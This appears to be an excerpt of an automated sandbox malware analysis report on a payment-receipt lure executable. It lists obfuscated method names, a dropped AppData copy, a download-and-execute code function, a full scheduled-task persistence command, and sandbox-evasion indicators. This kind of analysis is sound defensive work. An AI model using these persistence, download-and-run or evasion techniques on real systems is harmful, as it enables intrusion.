Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0779CA8E push cs; iretd 9_2_0779CA8F
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0779E9FB push cs; retf 9_2_0779EA06
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00434006 push ecx; ret 12_2_00434019
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004567F0 push eax; ret 12_2_0045680E
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00463EF3 push ds; retf 12_2_00463EEC
Source: SwiftCopy_PaymtRecpt121228.exe | Static PE information: section name: .text entropy: 7.753706861790718
Source: eaJOpx.exe.0.dr | Static PE information: section name: .text entropy: 7.753706861790718
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ooK3AkAQIu8efntkad.cs | High entropy of concatenated method names: 'F2NuefQARF', 'ulTumdT508', 'U4tuikyOIX', 'Qlpi9q8EHL', 'D8VizRdOq8', 'ynpuE8aHMv', 'N0LuC16cb6', 'XEQuX6qxBo', 'w9Xup8Tcxx', 'oNwuKBL4ll'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, lCdxmZGJ13p9rdDdZF.cs | High entropy of concatenated method names: 'Dispose', 'KFxCLph07m', 'lP0X2eiHDJ', 'qfPKk2RFlX', 'Q5PC9r818A', 'yLQCz6Su1P', 'ProcessDialogKey', 'CcjXE9OTkk', 'SYYXCXRXIY', 'LsaXXM3IMV'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, z9OTkkLIYYXRXIYAsa.cs | High entropy of concatenated method names: 'N9Y3YUvA7W', 'HuP32iOUXv', 'tm73olTsla', 'z0T3QKjHNI', 'OpW3cLVFvr', 'wmI3Dujfup', 'fEU3Ag3rr3', 'QRc3F1j6Cs', 'vFU3aLFkwd', 'iZy3baCbqQ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, hU0Fe9zGldXS0Zr1mm.cs | High entropy of concatenated method names: 'IttZ5u5Po6', 'bA7ZWyULpA', 'FuFZ02M4Gf', 'KqCZYcJcmF', 'UrHZ2UCZso', 'adAZQwJHh2', 'AYVZcl52pR', 'DTCZUmTiwj', 'xofZgXpO31', 'dtFZs8PBRb'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ef5widqqZBqkuBxRSP.cs | High entropy of concatenated method names: 'e4Lphsfw6d', 's9XpeN6bK2', 'pMRpGF6MRr', 'gt4pmUcDg4', 'DITplFwmd8', 'Uk1piVKaEY', 'Y6Bpuq85Ei', 'T9Ipq5U8RI', 'AnypTCdkJJ', 'lidp85By9j'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, DlfsjvW8qU2neLHntS.cs | High entropy of concatenated method names: 'DhcGRp3UHU', 'sYmGIllQZQ', 'wxDGktkLoP', 'OusGJk5yMI', 'mBnGN1cbFv', 'Be5Gf4tmIw', 'alZG7nFKWj', 'HrkGVoISco', 'xwMGLRJLg1', 'mNEG9WjBKi'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, JiRbLSYRlBl4b0VgTN.cs | High entropy of concatenated method names: 'Gnlih8TKvZ', 'zVMiGU0SGN', 'vhpilWJYAL', 'spJiuDZe9r', 'm0uiqogaRG', 'GZYlNTsrxL', 'hnWlfKONqO', 'Ic4l76Snql', 'qq6lVjrsuD', 'wI6lLRSaAP'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, CVXAVe7nWDFxph07mH.cs | High entropy of concatenated method names: 'lfN31huEZn', 'x4L34MgUej', 'qJl336xcwI', 'OsK3wWaSHC', 'lYc361il2U', 'wI93UI96Gg', 'Dispose', 'YZKMebO1fX', 'bflMGDr1Fv', 'fT3MmoxwAZ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, eypnOtCKX1eP4JZEaNs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bPXS3lbc2i', 'jhYSZtbsa6', 'I1BSw6NYOX', 'RijSSEvUpr', 'S62S6y1jVP', 'e4ySdpCWPO', 'LVISUxnroj'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, q3IMVh9eXLPFjsBI68.cs | High entropy of concatenated method names: 'VyfZm3XTtf', 'qDLZl3geNL', 'PQhZiL4JCa', 'PHXZuWloVa', 'TLPZ3gr9wA', 'XtNZquhPuR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, W0GiVD07L1dakng1fT.cs | High entropy of concatenated method names: 'ufGmPc6fx8', 'Cm6m51Ni4y', 'kUHmWHPVZ0', 'a8nm0OtQqr', 'yStm1oT8Nx', 'GgxmvV7jS6', 'hlrm49FaMP', 'vdHmMe0aKP', 'y8Hm3hJL4S', 'UfLmZnPWGa'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, UT08udX6WOGG1Xdpo8.cs | High entropy of concatenated method names: 'vQijmec5j', 'fRxPdjepW', 'tdu5Sij0e', 'pUpBNTGrG', 'Bp20Mq0rn', 'i0uxUgMWn', 'egcTkbRqS0x1DCXqCI', 'jpqEOM19i4GK7353Iu', 'W1SMfdqFK', 'LKyZVyMyo'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ERn86KasASr1vtjG5F.cs | High entropy of concatenated method names: 'mXnugMDxUb', 'dsyusLDu8S', 'FHyujnOjqU', 'fDduP4Hjgy', 'KLmutvsNTb', 'ypAu5sxZKr', 'MLXuBb6DBs', 'z6FuW5C34O', 'T4Iu0f2Zn0', 'KHSuxZ2P3x'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, QqHRLaRpJUUjNPWaM6.cs | High entropy of concatenated method names: 'npl1bedkBg', 'I051nMu9KL', 'D6T1RNOug8', 'f8O1IOGhMt', 'VC612NYrjF', 'i7Z1oc7DTG', 'FvX1Q3jON6', 'r2g1cOS5Qx', 'BkR1DelgRy', 'xyr1AiJuwb'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ewK3dTKT9pbHQwq4m4.cs | High entropy of concatenated method names: 'rCWCulfsjv', 'mqUCq2neLH', 'J7LC81dakn', 'x1fCrTkhkT', 'Ot1C1RtciR', 'NLSCvRlBl4', 'ISa2h4pWZNLcAnEwMB', 'qgsLUkztL6r8CNyPmK', 'TCxCCS5i6s', 'Kr2Cp8VVuh'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, I4yCbBHuJi9Z8K8qlV.cs | High entropy of concatenated method names: 'wNwOWqRYUx', 'gP0O0KCr7W', 'oJqOYFtcOT', 'cVbO2Qh4NV', 'gGeOQg9hgp', 'KFcOcXtdv1', 'kcMOALICrX', 'onyOFXN1pd', 'MMXObMLC9i', 'e2rOyZ5DCj'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, CljGtOkAwYyBjbav2l.cs | High entropy of concatenated method names: 'ToString', 'gxpvy6Zs2P', 'fVfv2KKZyX', 'JdavoCFodL', 'MEcvQxhdak', 'KIDvcjImfM', 'DrKvD08QR9', 'gu0vAnAavW', 'jbyvFArmSb', 'gYlvahD8vP'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, vLjfL3CEHUOl1VQ9Tso.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYnZyLIB2E', 'uWTZn1saqq', 'MbtZHkR7TY', 'eI8ZRINpeC', 'peNZIRIstg', 'crEZkN9PHw', 'gtsZJVprfU'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, oijrmXCCIbXkLRKl9M7.cs | High entropy of concatenated method names: 'IZvZ99vJ0v', 'Y1JZzJjhSB', 'erOwEjPYwo', 'aPhwCqA0Qy', 'TYSwXn9vdn', 'I8BwpWeG41', 'dxGwKHTjSs', 'RTBwhb0JKX', 'mD1weMWGhm', 'mDjwG0YtmJ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.426aba8.0.raw.unpack, ruWa8kfTr9ZynRX962.cs | High entropy of concatenated method names: 'baU4VFvOhR', 'R9u49qq8Fq', 'RPjMEP8Qyl', 'oVaMCmwbgw', 'J6Z4ygaOYp', 'UOQ4n6RtiL', 'abp4HMJRyj', 'OHP4RWMjPl', 'rWp4IlrEKw', 'Kct4ka3S7W'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ooK3AkAQIu8efntkad.cs | High entropy of concatenated method names: 'F2NuefQARF', 'ulTumdT508', 'U4tuikyOIX', 'Qlpi9q8EHL', 'D8VizRdOq8', 'ynpuE8aHMv', 'N0LuC16cb6', 'XEQuX6qxBo', 'w9Xup8Tcxx', 'oNwuKBL4ll'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, lCdxmZGJ13p9rdDdZF.cs | High entropy of concatenated method names: 'Dispose', 'KFxCLph07m', 'lP0X2eiHDJ', 'qfPKk2RFlX', 'Q5PC9r818A', 'yLQCz6Su1P', 'ProcessDialogKey', 'CcjXE9OTkk', 'SYYXCXRXIY', 'LsaXXM3IMV'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, z9OTkkLIYYXRXIYAsa.cs | High entropy of concatenated method names: 'N9Y3YUvA7W', 'HuP32iOUXv', 'tm73olTsla', 'z0T3QKjHNI', 'OpW3cLVFvr', 'wmI3Dujfup', 'fEU3Ag3rr3', 'QRc3F1j6Cs', 'vFU3aLFkwd', 'iZy3baCbqQ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, hU0Fe9zGldXS0Zr1mm.cs | High entropy of concatenated method names: 'IttZ5u5Po6', 'bA7ZWyULpA', 'FuFZ02M4Gf', 'KqCZYcJcmF', 'UrHZ2UCZso', 'adAZQwJHh2', 'AYVZcl52pR', 'DTCZUmTiwj', 'xofZgXpO31', 'dtFZs8PBRb'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ef5widqqZBqkuBxRSP.cs | High entropy of concatenated method names: 'e4Lphsfw6d', 's9XpeN6bK2', 'pMRpGF6MRr', 'gt4pmUcDg4', 'DITplFwmd8', 'Uk1piVKaEY', 'Y6Bpuq85Ei', 'T9Ipq5U8RI', 'AnypTCdkJJ', 'lidp85By9j'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, DlfsjvW8qU2neLHntS.cs | High entropy of concatenated method names: 'DhcGRp3UHU', 'sYmGIllQZQ', 'wxDGktkLoP', 'OusGJk5yMI', 'mBnGN1cbFv', 'Be5Gf4tmIw', 'alZG7nFKWj', 'HrkGVoISco', 'xwMGLRJLg1', 'mNEG9WjBKi'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, JiRbLSYRlBl4b0VgTN.cs | High entropy of concatenated method names: 'Gnlih8TKvZ', 'zVMiGU0SGN', 'vhpilWJYAL', 'spJiuDZe9r', 'm0uiqogaRG', 'GZYlNTsrxL', 'hnWlfKONqO', 'Ic4l76Snql', 'qq6lVjrsuD', 'wI6lLRSaAP'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, CVXAVe7nWDFxph07mH.cs | High entropy of concatenated method names: 'lfN31huEZn', 'x4L34MgUej', 'qJl336xcwI', 'OsK3wWaSHC', 'lYc361il2U', 'wI93UI96Gg', 'Dispose', 'YZKMebO1fX', 'bflMGDr1Fv', 'fT3MmoxwAZ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, eypnOtCKX1eP4JZEaNs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bPXS3lbc2i', 'jhYSZtbsa6', 'I1BSw6NYOX', 'RijSSEvUpr', 'S62S6y1jVP', 'e4ySdpCWPO', 'LVISUxnroj'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, q3IMVh9eXLPFjsBI68.cs | High entropy of concatenated method names: 'VyfZm3XTtf', 'qDLZl3geNL', 'PQhZiL4JCa', 'PHXZuWloVa', 'TLPZ3gr9wA', 'XtNZquhPuR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, W0GiVD07L1dakng1fT.cs | High entropy of concatenated method names: 'ufGmPc6fx8', 'Cm6m51Ni4y', 'kUHmWHPVZ0', 'a8nm0OtQqr', 'yStm1oT8Nx', 'GgxmvV7jS6', 'hlrm49FaMP', 'vdHmMe0aKP', 'y8Hm3hJL4S', 'UfLmZnPWGa'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, UT08udX6WOGG1Xdpo8.cs | High entropy of concatenated method names: 'vQijmec5j', 'fRxPdjepW', 'tdu5Sij0e', 'pUpBNTGrG', 'Bp20Mq0rn', 'i0uxUgMWn', 'egcTkbRqS0x1DCXqCI', 'jpqEOM19i4GK7353Iu', 'W1SMfdqFK', 'LKyZVyMyo'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ERn86KasASr1vtjG5F.cs | High entropy of concatenated method names: 'mXnugMDxUb', 'dsyusLDu8S', 'FHyujnOjqU', 'fDduP4Hjgy', 'KLmutvsNTb', 'ypAu5sxZKr', 'MLXuBb6DBs', 'z6FuW5C34O', 'T4Iu0f2Zn0', 'KHSuxZ2P3x'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, QqHRLaRpJUUjNPWaM6.cs | High entropy of concatenated method names: 'npl1bedkBg', 'I051nMu9KL', 'D6T1RNOug8', 'f8O1IOGhMt', 'VC612NYrjF', 'i7Z1oc7DTG', 'FvX1Q3jON6', 'r2g1cOS5Qx', 'BkR1DelgRy', 'xyr1AiJuwb'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ewK3dTKT9pbHQwq4m4.cs | High entropy of concatenated method names: 'rCWCulfsjv', 'mqUCq2neLH', 'J7LC81dakn', 'x1fCrTkhkT', 'Ot1C1RtciR', 'NLSCvRlBl4', 'ISa2h4pWZNLcAnEwMB', 'qgsLUkztL6r8CNyPmK', 'TCxCCS5i6s', 'Kr2Cp8VVuh'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, I4yCbBHuJi9Z8K8qlV.cs | High entropy of concatenated method names: 'wNwOWqRYUx', 'gP0O0KCr7W', 'oJqOYFtcOT', 'cVbO2Qh4NV', 'gGeOQg9hgp', 'KFcOcXtdv1', 'kcMOALICrX', 'onyOFXN1pd', 'MMXObMLC9i', 'e2rOyZ5DCj'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, CljGtOkAwYyBjbav2l.cs | High entropy of concatenated method names: 'ToString', 'gxpvy6Zs2P', 'fVfv2KKZyX', 'JdavoCFodL', 'MEcvQxhdak', 'KIDvcjImfM', 'DrKvD08QR9', 'gu0vAnAavW', 'jbyvFArmSb', 'gYlvahD8vP'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, vLjfL3CEHUOl1VQ9Tso.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYnZyLIB2E', 'uWTZn1saqq', 'MbtZHkR7TY', 'eI8ZRINpeC', 'peNZIRIstg', 'crEZkN9PHw', 'gtsZJVprfU'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, oijrmXCCIbXkLRKl9M7.cs | High entropy of concatenated method names: 'IZvZ99vJ0v', 'Y1JZzJjhSB', 'erOwEjPYwo', 'aPhwCqA0Qy', 'TYSwXn9vdn', 'I8BwpWeG41', 'dxGwKHTjSs', 'RTBwhb0JKX', 'mD1weMWGhm', 'mDjwG0YtmJ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.8e60000.5.raw.unpack, ruWa8kfTr9ZynRX962.cs | High entropy of concatenated method names: 'baU4VFvOhR', 'R9u49qq8Fq', 'RPjMEP8Qyl', 'oVaMCmwbgw', 'J6Z4ygaOYp', 'UOQ4n6RtiL', 'abp4HMJRyj', 'OHP4RWMjPl', 'rWp4IlrEKw', 'Kct4ka3S7W'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ooK3AkAQIu8efntkad.cs | High entropy of concatenated method names: 'F2NuefQARF', 'ulTumdT508', 'U4tuikyOIX', 'Qlpi9q8EHL', 'D8VizRdOq8', 'ynpuE8aHMv', 'N0LuC16cb6', 'XEQuX6qxBo', 'w9Xup8Tcxx', 'oNwuKBL4ll'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, lCdxmZGJ13p9rdDdZF.cs | High entropy of concatenated method names: 'Dispose', 'KFxCLph07m', 'lP0X2eiHDJ', 'qfPKk2RFlX', 'Q5PC9r818A', 'yLQCz6Su1P', 'ProcessDialogKey', 'CcjXE9OTkk', 'SYYXCXRXIY', 'LsaXXM3IMV'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, z9OTkkLIYYXRXIYAsa.cs | High entropy of concatenated method names: 'N9Y3YUvA7W', 'HuP32iOUXv', 'tm73olTsla', 'z0T3QKjHNI', 'OpW3cLVFvr', 'wmI3Dujfup', 'fEU3Ag3rr3', 'QRc3F1j6Cs', 'vFU3aLFkwd', 'iZy3baCbqQ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, hU0Fe9zGldXS0Zr1mm.cs | High entropy of concatenated method names: 'IttZ5u5Po6', 'bA7ZWyULpA', 'FuFZ02M4Gf', 'KqCZYcJcmF', 'UrHZ2UCZso', 'adAZQwJHh2', 'AYVZcl52pR', 'DTCZUmTiwj', 'xofZgXpO31', 'dtFZs8PBRb'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ef5widqqZBqkuBxRSP.cs | High entropy of concatenated method names: 'e4Lphsfw6d', 's9XpeN6bK2', 'pMRpGF6MRr', 'gt4pmUcDg4', 'DITplFwmd8', 'Uk1piVKaEY', 'Y6Bpuq85Ei', 'T9Ipq5U8RI', 'AnypTCdkJJ', 'lidp85By9j'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, DlfsjvW8qU2neLHntS.cs | High entropy of concatenated method names: 'DhcGRp3UHU', 'sYmGIllQZQ', 'wxDGktkLoP', 'OusGJk5yMI', 'mBnGN1cbFv', 'Be5Gf4tmIw', 'alZG7nFKWj', 'HrkGVoISco', 'xwMGLRJLg1', 'mNEG9WjBKi'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, JiRbLSYRlBl4b0VgTN.cs | High entropy of concatenated method names: 'Gnlih8TKvZ', 'zVMiGU0SGN', 'vhpilWJYAL', 'spJiuDZe9r', 'm0uiqogaRG', 'GZYlNTsrxL', 'hnWlfKONqO', 'Ic4l76Snql', 'qq6lVjrsuD', 'wI6lLRSaAP'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, CVXAVe7nWDFxph07mH.cs | High entropy of concatenated method names: 'lfN31huEZn', 'x4L34MgUej', 'qJl336xcwI', 'OsK3wWaSHC', 'lYc361il2U', 'wI93UI96Gg', 'Dispose', 'YZKMebO1fX', 'bflMGDr1Fv', 'fT3MmoxwAZ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, eypnOtCKX1eP4JZEaNs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bPXS3lbc2i', 'jhYSZtbsa6', 'I1BSw6NYOX', 'RijSSEvUpr', 'S62S6y1jVP', 'e4ySdpCWPO', 'LVISUxnroj'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, q3IMVh9eXLPFjsBI68.cs | High entropy of concatenated method names: 'VyfZm3XTtf', 'qDLZl3geNL', 'PQhZiL4JCa', 'PHXZuWloVa', 'TLPZ3gr9wA', 'XtNZquhPuR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, W0GiVD07L1dakng1fT.cs | High entropy of concatenated method names: 'ufGmPc6fx8', 'Cm6m51Ni4y', 'kUHmWHPVZ0', 'a8nm0OtQqr', 'yStm1oT8Nx', 'GgxmvV7jS6', 'hlrm49FaMP', 'vdHmMe0aKP', 'y8Hm3hJL4S', 'UfLmZnPWGa'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, UT08udX6WOGG1Xdpo8.cs | High entropy of concatenated method names: 'vQijmec5j', 'fRxPdjepW', 'tdu5Sij0e', 'pUpBNTGrG', 'Bp20Mq0rn', 'i0uxUgMWn', 'egcTkbRqS0x1DCXqCI', 'jpqEOM19i4GK7353Iu', 'W1SMfdqFK', 'LKyZVyMyo'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ERn86KasASr1vtjG5F.cs | High entropy of concatenated method names: 'mXnugMDxUb', 'dsyusLDu8S', 'FHyujnOjqU', 'fDduP4Hjgy', 'KLmutvsNTb', 'ypAu5sxZKr', 'MLXuBb6DBs', 'z6FuW5C34O', 'T4Iu0f2Zn0', 'KHSuxZ2P3x'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, QqHRLaRpJUUjNPWaM6.cs | High entropy of concatenated method names: 'npl1bedkBg', 'I051nMu9KL', 'D6T1RNOug8', 'f8O1IOGhMt', 'VC612NYrjF', 'i7Z1oc7DTG', 'FvX1Q3jON6', 'r2g1cOS5Qx', 'BkR1DelgRy', 'xyr1AiJuwb'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ewK3dTKT9pbHQwq4m4.cs | High entropy of concatenated method names: 'rCWCulfsjv', 'mqUCq2neLH', 'J7LC81dakn', 'x1fCrTkhkT', 'Ot1C1RtciR', 'NLSCvRlBl4', 'ISa2h4pWZNLcAnEwMB', 'qgsLUkztL6r8CNyPmK', 'TCxCCS5i6s', 'Kr2Cp8VVuh'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, I4yCbBHuJi9Z8K8qlV.cs | High entropy of concatenated method names: 'wNwOWqRYUx', 'gP0O0KCr7W', 'oJqOYFtcOT', 'cVbO2Qh4NV', 'gGeOQg9hgp', 'KFcOcXtdv1', 'kcMOALICrX', 'onyOFXN1pd', 'MMXObMLC9i', 'e2rOyZ5DCj'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, CljGtOkAwYyBjbav2l.cs | High entropy of concatenated method names: 'ToString', 'gxpvy6Zs2P', 'fVfv2KKZyX', 'JdavoCFodL', 'MEcvQxhdak', 'KIDvcjImfM', 'DrKvD08QR9', 'gu0vAnAavW', 'jbyvFArmSb', 'gYlvahD8vP'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, vLjfL3CEHUOl1VQ9Tso.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JYnZyLIB2E', 'uWTZn1saqq', 'MbtZHkR7TY', 'eI8ZRINpeC', 'peNZIRIstg', 'crEZkN9PHw', 'gtsZJVprfU'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, oijrmXCCIbXkLRKl9M7.cs | High entropy of concatenated method names: 'IZvZ99vJ0v', 'Y1JZzJjhSB', 'erOwEjPYwo', 'aPhwCqA0Qy', 'TYSwXn9vdn', 'I8BwpWeG41', 'dxGwKHTjSs', 'RTBwhb0JKX', 'mD1weMWGhm', 'mDjwG0YtmJ'
Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.41adf88.1.raw.unpack, ruWa8kfTr9ZynRX962.cs | High entropy of concatenated method names: 'baU4VFvOhR', 'R9u49qq8Fq', 'RPjMEP8Qyl', 'oVaMCmwbgw', 'J6Z4ygaOYp', 'UOQ4n6RtiL', 'abp4HMJRyj', 'OHP4RWMjPl', 'rWp4IlrEKw', 'Kct4ka3S7W'
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW, 12_2_00406128
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | File created: C:\Users\user\AppData\Roaming\eaJOpx.exe

                Boot Survival

Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 12_2_00419BD4

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Code function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: 23E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: 2630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: 2440000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: 8F90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: 9F90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: A1C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: B1C0000 memory reserve | memory write watch
